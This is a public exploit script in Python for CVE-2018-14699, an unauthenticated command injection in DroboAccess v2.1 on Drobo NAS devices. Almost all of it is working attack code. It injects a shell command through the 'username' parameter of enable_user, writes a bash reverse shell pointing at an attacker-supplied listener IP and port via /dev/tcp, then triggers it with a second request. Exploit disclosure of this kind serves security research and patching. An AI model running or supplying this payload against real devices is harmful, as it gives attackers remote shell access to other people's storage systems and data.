#Exploit Title: Error Based Command Injection in DroboAccess v2.1 (UnAuthenticated)
#Date: 09/09/2022
#Exploit Author: RevoCaine
#Vendor Homepage: https://www.drobo.com
#Software Version: DroboAccess v2.1 enable_user.php
#Tested on: Drobo B810n 
#CVE: CVE-2018-14699


#!/usr/bin/python3
import requests
import argparse
import urllib

#Usage Details
parser = argparse.ArgumentParser(description="Error Based Command injection in DroboAcess.php (UnAuthenticated)")
parser.add_argument('-t', '--target', help='host for exploitation, ex. 192.168.1.122:8080',required=True)
parser.add_argument('-l', '--listener-ip', help='listener IP', required=True)
parser.add_argument('-p', '--port', help='port number of the listener', required=True)
args = parser.parse_args()


#Attempts to exploit and copy the reverse shell to the vulnerable machine
try:
    session = requests.session()
    shell = "test';echo \"/bin/bash -i >& /dev/tcp/"+args.listener_ip+"/"+args.port+" 0>&1\" > revshell'"
    upload = "http://" + args.target + "/DroboAccess/enable_user"
    print(upload)
    print("[*] Sending Commands")
    upload_response = session.get(upload, params={"username": shell, "enabled": "true"})
    print(upload_response.content)
#Error Checking for exploit
    if upload_response.content.__contains__(b"sucessfully"):
        print("[*] Exploit Successfully Uploaded to Target!")
    else:
        print("[-] Exploit Failed, try another command")
        exit(1)
except Exception as e:
    print("[!] Error: ", e)
    print("[-] Exploit Failed")
    exit(1)
#Execution of reverse shell
try:
    params = "test2';bash revshell'"
    exploit = "http://"+args.target+"/DroboAccess/enable_user"
    print("[*] Executing Exploit, Check your Listener!")
    response = session.get(exploit, params={"username": params, "enabled": "True"})
except Exception as e:
    print("[!] Error: ", e)
    print("[-] Exploit Failed")
    exit(1)